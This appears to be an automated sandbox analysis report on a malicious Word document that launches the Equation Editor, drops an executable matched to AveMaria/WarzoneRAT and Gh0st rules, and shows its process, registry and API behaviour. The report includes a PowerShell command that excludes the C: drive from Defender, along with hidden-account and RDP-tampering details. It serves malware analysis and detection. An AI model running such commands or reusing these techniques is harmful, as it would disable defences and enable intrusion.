            Source: 5.2.fiftikmernk852317.exe.24389af.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.3.fiftikmernk852317.exe.4cff90.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.3.fiftikmernk852317.exe.4cff90.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.3.fiftikmernk852317.exe.4cd188.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.3.fiftikmernk852317.exe.4cd188.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPE | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000005.00000002.1180455880.0000000000AEF000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 00000005.00000003.980168722.00000000004CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000005.00000003.980064261.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: String function: 009B0969 appears 48 times
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: String function: 009A35E5 appears 40 times
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_003FB2EE NtQuerySystemInformation,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_003FB2CC NtQuerySystemInformation,
            Source: New Order ( MY 01-22-DTHI .LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\New Order ( MY 01-22-DTHI .doc
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$w Order ( MY 01-22-DTHI .doc
            Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@9/11@0/2
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009AD49C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_00DD7C10 LoadResource,LockResource,SizeofResource,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | File created: C:\Program Files\Microsoft DN1
            Source: ~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmp.0.dr | OLE document summary: title field not present or empty
            Source: ~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmp.0.dr | OLE document summary: author field not present or empty
            Source: ~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmp.0.dr | OLE document summary: edited time not present or 0
            Source: New Order ( MY 01-22-DTHI .doc | Virustotal: Detection: 42%
            Source: New Order ( MY 01-22-DTHI .doc | Metadefender: Detection: 42%
            Source: New Order ( MY 01-22-DTHI .doc | ReversingLabs: Detection: 47%
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe C:\Users\user\AppData\Roaming\fiftikmernk852317.exe
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe "C:\Users\user\AppData\Roaming\fiftikmernk852317.exe"
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{62BE5D10-60EB-11D0-BD3B-00A0C911CE86}\InprocServer32
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009AF619 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_003FACEE AdjustTokenPrivileges,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_003FACB7 AdjustTokenPrivileges,
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR585C.tmp
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_00DD1DD0 CoCreateInstance,StringFromGUID2,__alloca_probe_16,strcpy_s,strcat_s,strcat_s,strcat_s,RegQueryInfoKeyA,RegQueryInfoKeyA,strcpy_s,strcat_s,strcat_s,strcat_s,RegQueryInfoKeyA,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009B20B8 RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Directory created: C:\Program Files\Microsoft DN1
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdbAA source: powershell.exe, 00000006.00000002.993133071.00000000057CD000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: G??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.1468.35906984on.pdby.resources.exes.exeI.ni.dlle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\.Ne source: powershell.exe, 00000006.00000002.988242865.0000000000534000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbK source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdb^ source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.988694362.00000000029B6000.00000004.00000020.00020000.00000000.sdmp
            Source: ~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0068C140 pushad ; retf 0069h
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0068B39F pushad ; retf
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_00DD8F76 push ecx; ret
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009A1190 push eax; ret
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_02420ACF push eax; ret
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_02433DF0 push ebp; retf
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009AFA42 LoadLibraryA,GetProcAddress,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009AD418 NetUserAdd,NetLocalGroupAddMembers,
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fifthikmerozx[1].exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009A27D3 URLDownloadToFileW,ShellExecuteW,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009AAC0A lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009AA6C8 GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | Code function: 5_2_009AD508 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe | File opened: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe:Zone.Identifier read attributes | delete
            Source: fiftikmernk852317.exe | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: fiftikmernk852317.exe, 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: fiftikmernk852317.exe, 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: fiftikmernk852317.exe, 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
